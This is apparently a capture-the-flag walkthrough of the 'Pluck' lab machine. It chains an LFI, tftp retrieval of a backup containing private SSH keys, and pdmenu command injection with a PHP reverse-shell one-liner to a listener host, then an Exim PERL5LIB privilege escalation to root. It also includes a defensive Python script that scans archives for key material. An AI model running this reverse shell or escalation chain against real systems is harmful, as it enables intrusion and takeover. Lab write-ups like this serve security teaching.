The main point, I think, is to pay attention to details; that matters most.
Ok let's start:
Nmap scan report for 172.16.3.4
Host is up (0.00099s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:01:7F:D6 (VMware)
In the web application we find a straightforward LFI:
http://10.0.0.1/index.php?page=/etc/passwd
This shows us two interesting rows:
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu (next challenge?)
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
Let's look at the backup.sh script:
http://172.16.3.4/index.php?page=/usr/local/scripts/backup.sh
#Backup directories in /backups so we can get it via tftp
echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
It seems a tftp server is running.
tftp> get backup.tar
Received 1824718 bytes in 0.3 seconds
tftp> exit
tar xvf backup.tar
Digging through the backups...
admin.php is an SQL injection troll, so there is no SQL injection there.
/home/paul/keys/ holds a lot of private/public key pairs; the working one:
ssh -i id_key4 paul@pluck
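The real leak here is backup.tar itself: a tarball of /home and the web root served over unauthenticated tftp, with Paul's private keys inside. As an added example (not from the original post), here is a small Python pre-publication check that scans an archive for key material and sensitive dotfiles before it is dropped anywhere reachable; the archive contents and the path patterns are constructed for illustration.

```python
import io
import re
import tarfile

# Paths that should never ship in a backup handed out over tftp
# (pattern list is my own choice, not from the target's script).
SENSITIVE_PATH_RE = re.compile(
    r"(/\.ssh/|/keys/|/\.viminfo$|/\.bash_history$|/\.mysql_history$|/shadow$)"
)
# Key material is flagged by content, wherever the file happens to live.
PRIVATE_KEY_RE = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")


def scan_backup(tar_bytes):
    """Return (member_name, reason) for every member that looks sensitive."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            # tar strips the leading "/", restore it so anchors work
            name = "/" + member.name.lstrip("./")
            if SENSITIVE_PATH_RE.search(name):
                findings.append((member.name, "sensitive path"))
                continue
            head = tar.extractfile(member).read(4096)  # header is enough
            if PRIVATE_KEY_RE.search(head):
                findings.append((member.name, "private key material"))
    return findings


def build_sample_backup():
    """Constructed stand-in for backup.tar: web root plus two home dirs."""
    files = {
        "var/www/html/index.php": b"<?php echo 'Pluck'; ?>\n",
        "home/paul/keys/id_key4": b"-----BEGIN RSA PRIVATE KEY-----\n"
                                  b"MIIE...constructed...\n"
                                  b"-----END RSA PRIVATE KEY-----\n",
        "home/paul/.viminfo": b"# This viminfo file was generated by Vim\n",
        "home/paul/notes.txt": b"nothing secret here\n",
        # key in an unusual location: only the content check catches it
        "home/dave/id_rsa": b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                            b"b3Bl...constructed...\n"
                            b"-----END OPENSSH PRIVATE KEY-----\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(name=path)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in scan_backup(build_sample_backup()):
        print(f"{reason:22} {member}")
```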
In all of pdmenu's options, arbitrary commands can be executed through command substitution, e.g. $(id).
Using a PHP reverse shell one-liner:
$(php -r '$sock=fsockopen("10.0.0.1",80);exec("/bin/sh -i <&3 >&3 2>&3");')
and a listener:
nc -lvp 80
Listening on [0.0.0.0] (family 0, port 80)
Connection from [10.0.0.1] port 80 [tcp/http] accepted (family 2, sport 53278)
$ id
uid=1002(paul) gid=1002(paul) groups=1002(paul)
Looking for SUID files:
find / -perm -4000 -ls 2>/dev/null
This reveals a vulnerable Exim binary:
153966 1024 -rwsr-xr-x 1 root root 1046368 Jan 18 08:54 /usr/exim/bin/exim-4.84-7
The exploit is very simple and trivial to use; you may also find a hint in the .viminfo file.
It seems to be left over from Exim local privilege escalation testing, and the author forgot to clean it up properly :)
-'  1  0  /tmp/asdf.pm
-'  4  0  /tmp/test.pm
Let's try:
Exploit-DB: 39535
...snip
$ PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
id
uid=0(root) gid=1002(paul) groups=1002(paul)
$ cd /root
$ ls
flag.txt
$ cat flag.txt
Congratulations you found the flag
---------------------------------------
[ASCII-art flag banner]
Cool :)
Uptime: 45 min
Thank you very much for sharing this security roundup; it will enable me to gain the best knowledge about things I did not know before.